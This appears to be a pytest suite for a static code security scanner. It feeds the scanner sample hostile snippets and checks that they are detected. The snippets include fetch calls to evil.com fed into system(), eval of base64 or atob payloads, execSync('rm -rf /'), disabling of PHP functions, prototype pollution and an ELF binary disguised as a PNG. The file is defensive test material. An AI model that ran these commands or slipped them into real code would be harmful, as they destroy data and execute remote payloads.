import pytest
import os
import base64
from unittest.mock import patch
from gitgalaxy.security.security_lens import SecurityLens


@pytest.fixture
def lens():
    """Initializes the Security Lens with default policy thresholds."""
    return SecurityLens()


# ==============================================================================
# TEST 1: VULNERABILITY SIGNATURES & REGEX EXTRACTORS
# ==============================================================================
def test_sast_vulnerability_signatures(lens):
    """
    Proves the engine detects specific logic bombs, steganographic imports, prototype
    pollution, and credential leaks using its internal regex rules.
    """
    malicious_code = (
        "// 1. Hardcoded Secrets (Private Info)\n"
        "api_key = 'A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6'\n"  # gitleaks:allow
        "\n"
        "// 2. Dynamic Code Execution & Safety Bypasses (Danger & Safety Neg)\n"
        "ini_set('disable_functions', 0);\n"
        "eval(base64_decode(payload));\n"
        "\n"
        "// 3. Steganographic Imports (Shadow Imports)\n"
        "require('hidden_payload.png');\n"
        "\n"
        "// 4. Prototype Pollution (Flux)\n"
        "Object.__proto__ = { polluted: true };\n"
    )

    result = lens.scan_content(malicious_code, 15)
    counts = result["counts"]

    assert counts.get("hardcoded_secrets", 0) > 0, "Failed to detect high-entropy API key!"
    assert counts.get("safety_bypasses", 0) > 0, "Failed to detect safety bypass (ini_set)!"
    assert counts.get("high_risk_execution", 0) > 0, "Failed to detect dynamic execution payload (eval)!"
    assert counts.get("shadow_imports", 0) > 0, (
        "Failed to detect steganographic import!"
    )
    assert counts.get("state_mutation", 0) > 0, "Failed to detect prototype pollution!"


# ==============================================================================
# TEST 2: SHANNON ENTROPY & OBFUSCATION DETECTION
# ==============================================================================
def test_obfuscation_entropy_detection(lens):
    """
    Proves the string extractor drops small strings but accurately calculates
    Shannon Entropy on large, highly randomized base64/hex blocks.
    """
    # A highly random string wrapped in quotes (length > 64 to bypass the ReDoS shield)
    high_entropy_str = (
        "x" + base64.b64encode(os.urandom(100)).decode("utf-8") + "y8f!@#$A9Z"
    )
    code = f'var payload = "{high_entropy_str}";\n'

    result = lens.scan_content(code, 2)
    counts = result["counts"]

    assert counts.get("entropy", 0) > 0, (
        "Failed to calculate high Shannon Entropy on obfuscated string!"
    )


# ==============================================================================
# TEST 3: DATA FLOW TAINT TRACKING (Left-Hand Side Assignment)
# ==============================================================================
def test_data_flow_taint_tracking(lens):
    """
    Proves the engine can track multi-line taint from I/O sinks to execution
    sinks (RCE), and from LLM Hooks to RCE (Agentic RCE).
    """
    code = (
        "// Scenario A: Standard Tainted Injection (Multi-line)\n"
        "let user_input = fetch('http://evil.com/payload');\n"
        "system(user_input);\n"
        "\n"
        "// Scenario B: Same-line Prompt Injection\n"
        "invoke(fetch('http://api.com'));\n"
        "\n"
        "// Scenario C: Agentic RCE (LLM output fed to execution)\n"
        "ai_response = openai.chat.completions.create(prompt);\n"
        "system(ai_response);\n"
    )

    result = lens.scan_content(code, 10)
    counts = result["counts"]
    snippets = result["snippets"]

    assert counts.get("tainted_injection", 0) > 0, (
        "Failed to track I/O -> Danger taint path!"
    )
    assert counts.get("prompt_injection", 0) > 0, (
        "Failed to detect Same-Line Prompt Injection!"
    )
    assert counts.get("agentic_rce", 0) > 0, (
        "Failed to detect Agentic RCE (LLM -> Danger)!"
    )
    assert any(
        "[LLM State -> RCE]" in s for s in snippets.get("tainted_injection", [])
    ), "Failed to log the Agentic RCE snippet!"


# ==============================================================================
# TEST 4: THE AUTO-GEN SHIELD
# ==============================================================================
def test_auto_gen_shield_bypasses(lens):
    """
    Proves that machine generated code bypasses taint tracking and homoglyph
    searches to save CPU cycles and prevent false positives.
    """
    code = (
        "/* eslint-disable */\n"
        "// Auto-generated by Swagger\n"
        "import \u0400 from 'weird-unicode';\n"  # Homoglyph
        "let x = fetch('url');\n"
        "system(x);\n"  # Taint sequence
    )

    result = lens.scan_content(code, 5)
    counts = result["counts"]

    # Homoglyphs and Taint should be explicitly skipped for auto-gen
    assert counts.get("homoglyphs", 0) == 0, (
        "Auto-gen shield failed to block homoglyph scan!"
    )
    assert counts.get("tainted_injection", 0) == 0, (
        "Auto-gen shield failed to block Taint Tracking!"
    )


# ==============================================================================
# TEST 5: EVALUATE RISK & NETWORK CENTRALITY AMPLIFICATION
# ==============================================================================
def test_evaluate_risk_network_centrality(lens):
    """
    Proves the Network Centrality multiplier correctly amplifies threshold policies
    for highly central architecture nodes in the dependency graph.
    """
    hits = {
        "high_risk_execution": 50,
        "io": 20,
    }  # 70 hits in 100 LOC = 0.70 density (breaches 0.65 threshold)
    loc = 100

    # 1. Standard File
    standard_risk = lens.evaluate_risk(hits, loc, network_metrics=None)

    # 2. Central Architecture Node (Blast Radius > 1.0)
    network_data = {"normalized_blast_radius": 2.0, "betweenness_score": 0.1}
    amplified_risk = lens.evaluate_risk(hits, loc, network_metrics=network_data)

    assert "Data Injection Risk" in standard_risk
    assert "Data Injection Risk" in amplified_risk

    # The amplified risk density should be drastically higher due to network centrality
    assert amplified_risk["Data Injection Risk"] > standard_risk["Data Injection Risk"]


def test_evaluate_risk_prompt_injection_isolation(lens):
    """
    Proves that Prompt Injections that do NOT result in RCE are scored independently,
    without triggering the Critical RCE override.
    """
    hits = {
        "prompt_injection": 5,
        "agentic_rce": 0,
    }
    loc = 100

    risk = lens.evaluate_risk(hits, loc, network_metrics=None)

    assert "Prompt Injection Surface Risk" in risk
    assert "Autonomous Execution Vector (Critical)" not in risk


# ==============================================================================
# TEST 6: BINARY MAGIC BYTE & ENTROPY SCANNER
# ==============================================================================
def test_binary_magic_byte_scanner(lens):
    """
    Proves the X-Ray scanner detects Magic Byte mismatches, embedded execution
    headers (ELF/MZ), and extreme binary entropy.
    """
    # 1. Magic Byte Mismatch: Claiming it's a PNG, but providing an ELF header
    fake_png_bytes = b"\x7fELF some other binary data here"
    result_mismatch = lens.scan_binary(fake_png_bytes, ".png")

    assert "sec_extension_mismatch" in result_mismatch, (
        "Failed to detect Magic Byte mismatch!"
    )
    assert "sec_high_risk_execution" in result_mismatch, (
        "Failed to detect embedded ELF execution header!"
    )

    # 2. High Entropy Binary Payload
    random_bytes = os.urandom(50000)  # Large sample size guarantees entropy > 7.95
    result_entropy = lens.scan_binary(random_bytes, ".bin")

    assert "sec_reflection_metaprogramming" in result_entropy, (
        "Failed to calculate extreme binary entropy!"
    )


# ==============================================================================
# TEST 7: COMPREHENSIVE COVERAGE & SAFE FALLBACKS
# ==============================================================================
def test_comprehensive_risk_evaluation_coverage(lens):
    """
    Triggers every remaining catastrophic threshold, empty state fallback,
    and exception handler to achieve 100% branch coverage.
    """
    # 1. Empty Entropy Fallback
    assert lens._calculate_shannon_entropy("") == 0.0

    # 2. Safe Code Baseline (Zero False Positives)
    safe_hits = {"branch": 5, "structural_boundaries": 10}
    safe_risk = lens.evaluate_risk(safe_hits, 100)
    assert not safe_risk, "Safe code generated false positive risk exposures!"

    # 3. Total Threshold Breach (Triggering every risk vector simultaneously)
    apocalyptic_hits = {
        "reflection_metaprogramming": 500,  # Hidden Malware
        "dead_code": 500,  # Logic Bomb
        "io": 500,
        "high_risk_execution": 500,  # Data Injection
        "memory_corruption": 500,  # Memory Corruption
        "hardcoded_secrets": 500,  # Secrets Leak
        "agentic_rce": 1,  # Critical Agentic RCE Override
    }

    doomsday_risk = lens.evaluate_risk(apocalyptic_hits, 100)

    assert "Hidden Malware Risk" in doomsday_risk
    assert "Logic Bomb Risk" in doomsday_risk
    assert "Memory Corruption Risk" in doomsday_risk
    assert "Secrets Leak Risk" in doomsday_risk
    assert "Autonomous Execution Vector (Critical)" in doomsday_risk

    # 4. Binary Scanner Exception Handler
    # We pass a valid byte array to survive the header scan, but mock the Counter
    # to throw an exception, proving the except block safely swallows it.
    with patch(
        "gitgalaxy.security.security_lens.Counter",
        side_effect=ValueError("Simulated math crash"),
    ):
        result_crash = lens.scan_binary(b"\x00" * 300, ".bin")
        assert result_crash == {}

# 4. Binary Scanner Exception Handler
    # We pass a valid byte array to survive the header scan, but mock the Counter
    # to throw an exception, proving the except block safely swallows it.
    with patch(
        "gitgalaxy.security.security_lens.Counter",
        side_effect=ValueError("Simulated math crash"),
    ):
        result_crash = lens.scan_binary(b"\x00" * 300, ".bin")
        assert result_crash == {}


# ==============================================================================
# TEST 8: MINIFICATION & OBFUSCATION FALLBACK SCREEN (DEEP VALIDATION)
# ==============================================================================

def test_minified_fallback_standard_webpack_chunk(lens):
    """
    [HAPPY PATH] Proves the fallback screen detects multiple disparate execution 
    and I/O hooks inside a massive, unbroken 50,000-character line.
    """
    padding = "A" * 50000
    payload = f"var config='{padding}'; eval(atob(payload)); fetch('http://evil.com');"
    
    result = lens.scan_content(payload, loc=1)
    counts = result["counts"]
    snippets = result["snippets"]

    assert counts.get("high_risk_execution", 0) > 0, "Failed to catch 'eval(' in 50k char line."
    assert counts.get("io", 0) > 0, "Failed to catch 'fetch(' in 50k char line."
    assert any("[Minified Literal Hit]" in s for s in snippets.get("high_risk_execution", []))


def test_minified_fallback_substring_safety_trap(lens):
    """
    [UNHAPPY PATH] Proves the literal string matcher does not hallucinate on 
    safe substrings that mimic malicious hooks (e.g., 'evaluation' vs 'eval').
    """
    padding = "B" * 15000
    # Uses "evaluation(" and "prefetch(" to try and trick the literal search
    payload = f"const data = '{padding}'; function evaluation(x) {{ return true; }} prefetch(data);"
    
    result = lens.scan_content(payload, loc=1)
    counts = result["counts"]

    assert counts.get("high_risk_execution", 0) == 0, "Hallucinated 'eval(' on 'evaluation('!"
    assert counts.get("io", 0) == 0, "Hallucinated 'fetch(' on 'prefetch('!"


def test_minified_fallback_buried_node_stealer(lens):
    """
    [EXTREME BOUNDARY] Proves the $O(N)$ string search can locate a threat 
    buried at the absolute tail end of a 100KB buffer without timing out.
    """
    padding = "x" * 100000
    payload = f"module.exports = function() {{ var junk = '{padding}'; require('child_process').execSync('rm -rf /'); }};"
    
    result = lens.scan_content(payload, loc=1)
    counts = result["counts"]
    snippets = result["snippets"]

    assert counts.get("high_risk_execution", 0) > 0, "Failed to catch 'child_process' at 100KB depth!"
    assert "[Minified Literal Hit]: child_process" in str(snippets.get("high_risk_execution", []))


def test_minified_fallback_mass_threshold_evasion(lens):
    """
    [ADVERSARIAL TRAP] Proves the mathematical boundary of the 10% mass threshold.
    An attacker attempts to evade the fallback screen by padding the file with 
    just enough "safe" short lines to keep the safe_content > 10% of total mass, 
    while hiding the payload on a 300-character line that the regular regex drops.
    """
    # 15 safe lines, 11 chars each = 165 characters of "safe" content
    safe_lines = "let a = 1;\n" * 15 
    
    # 1 malicious line of ~320 characters
    malicious_long_line = "var b = '" + ("C" * 300) + "'; eval(b);\n" 
    
    payload = safe_lines + malicious_long_line
    
    # Total length = ~485. Safe length = 165.
    # 165 / 485 = ~34% safe content. 
    # Because 34% > 10%, the fallback screen mathematically WILL NOT run.
    # The standard regex WILL drop the 320-char line due to the < 250 ReDoS armor.
    
    result = lens.scan_content(payload, loc=16)
    counts = result["counts"]

    # This assertion CONFIRMS the evasion works, establishing the known physical 
    # limits of the 10% threshold design. 
    assert counts.get("high_risk_execution", 0) == 0, (
        "Threshold evasion failed! The fallback screen ran when it mathematically shouldn't have."
    )


def test_minified_fallback_near_miss_threshold(lens):
    """
    [PRECISION CHECK] Proves the fallback screen properly engages when the safe mass 
    is exactly at the 9% mark (just under the 10% threshold).
    """
    # 3 safe lines = ~33 characters
    safe_lines = "let a = 1;\n" * 3
    
    # 1 malicious line of ~400 characters
    malicious_long_line = "var b = '" + ("D" * 380) + "'; setTimeout(b, 1000);\n"
    
    payload = safe_lines + malicious_long_line
    
    # Total length = ~433. Safe length = 33.
    # 33 / 433 = ~7.6% safe content.
    # Because 7.6% < 10%, the fallback screen MUST engage.
    
    result = lens.scan_content(payload, loc=4)
    counts = result["counts"]

    assert counts.get("high_risk_execution", 0) > 0, (
        "Fallback screen failed to engage at the 7.6% mass threshold!"
    )

# ==============================================================================
# TEST 9: ADVERSARIAL DATA FLOW & TAINT TRACKING (LHS FALSE EQUIVALENCY)
# ==============================================================================

def test_adversarial_lhs_comparison_trap(lens):
    """
    [ADVERSARIAL TRAP] Proves that the Left-Hand Side (LHS) variable extractor 
    does not hallucinate on comparison operators (==, ===, !=, <=).
    """
    payload = """
    // Trap 1: Strict equality comparison
    if (status === 200) { console.log('OK'); }
    
    // Trap 2: Inequality comparison
    if (user_input !== "admin") { die(); }
    
    // Trap 3: Less than or equal
    if (retry_count <= 5) { retry(); }
    
    // Trap 4: String literal containing an assignment operator
    const endpoint = "https://api.example.com/?auth=" + token;
    
    // Actual Taint: This is the ONLY one that should trigger the flow
    let malicious_data = fetch('http://evil.com/payload');
    system(malicious_data);  // <--- Changed to system() to guarantee a valid execution sink
    """
    
    result = lens.scan_content(payload, loc=15)
    counts = result["counts"]
    snippets = str(result["snippets"])

    assert counts.get("tainted_injection", 0) == 1, (
        "LHS extractor failed to track the legitimate taint flow!"
    )
    assert "malicious_data" in snippets, "Failed to capture the correct tainted variable!"
    assert "status" not in snippets, "LHS extractor hallucinated on '==='!"


# ==============================================================================
# TEST 10: REGEX EVASION & WHITESPACE MANIPULATION
# ==============================================================================

def test_evasion_whitespace_padding(lens):
    """
    [ADVERSARIAL TRAP] Attackers frequently use massive amounts of whitespace, 
    tabs, and newlines between function calls and arguments to evade naive regex.
    This proves the core structural signatures are immune to whitespace evasion.
    """
    payload = """
    // Evasion 1: Spaced out safety bypass
    ini_set   (   'disable_functions'   ,   0   ) ;
    
    // Evasion 2: Spaced out dynamic execution (matches obfuscation model)
    eval  (   atob  (  payload  )  ) ;
    
    // Evasion 3: Bizarre spacing in prototype pollution
    Object  .  __proto__   =   { admin : true } ;
    """
    
    result = lens.scan_content(payload, loc=10)
    counts = result["counts"]

    assert counts.get("safety_bypasses", 0) > 0, "Whitespace evasion defeated safety bypass regex!"
    assert counts.get("high_risk_execution", 0) > 0, "Whitespace evasion defeated RCE regex!"
    assert counts.get("state_mutation", 0) > 0, "Whitespace evasion defeated prototype pollution regex!"


# ==============================================================================
# TEST 11: FALSE POSITIVE DEFENSE (STANDARD REGEX)
# ==============================================================================

def test_false_positive_substring_defense_standard(lens):
    """
    [PRECISION CHECK] Proves the standard regex extractors (not just the minified fallback)
    use strict word boundaries (\b) and do not hallucinate threats inside safe variables 
    or custom functions that happen to contain threat keywords.
    """
    payload = """
    // Safe variations of 'eval'
    function evaluate_math() { return true; }
    let evaluation_score = 100;
    const revalidation = false;
    
    // Safe variations of 'exec'
    let execute_order_66 = false;
    function my_executor() { pass; }
    
    // Safe variations of 'fetch'
    function prefetch_data() { pass; }
    let dog_fetch_toy = true;
    """
    
    result = lens.scan_content(payload, loc=12)
    counts = result["counts"]

    assert counts.get("high_risk_execution", 0) == 0, "Standard regex hallucinated on 'eval/exec' substring!"
    assert counts.get("io", 0) == 0, "Standard regex hallucinated on 'fetch' substring!"


# ==============================================================================
# TEST 12: AGENTIC RCE & PROMPT INJECTION ISOLATION
# ==============================================================================

def test_prompt_injection_without_execution(lens):
    """
    [PRECISION CHECK] Proves that if an I/O payload enters an LLM context, it triggers 
    a Prompt Injection alert, but if it STOPS there and never reaches `eval()` or a DB, 
    it DOES NOT trigger a tainted_injection or agentic_rce alert.
    """
    payload = """
    let user_chat = requests.post("http://api.chat.com");
    let ai_response = openai.chat.completions.create(user_chat);
    
    // The response is safely logged, not executed.
    console.log(ai_response);
    """
    
    result = lens.scan_content(payload, loc=6)
    counts = result["counts"]

    assert counts.get("prompt_injection", 0) > 0, "Failed to detect I/O flowing into LLM Hook!"
    assert counts.get("agentic_rce", 0) == 0, "Hallucinated an Agentic RCE where no execution occurred!"
    assert counts.get("tainted_injection", 0) == 0, "Hallucinated a standard RCE injection!"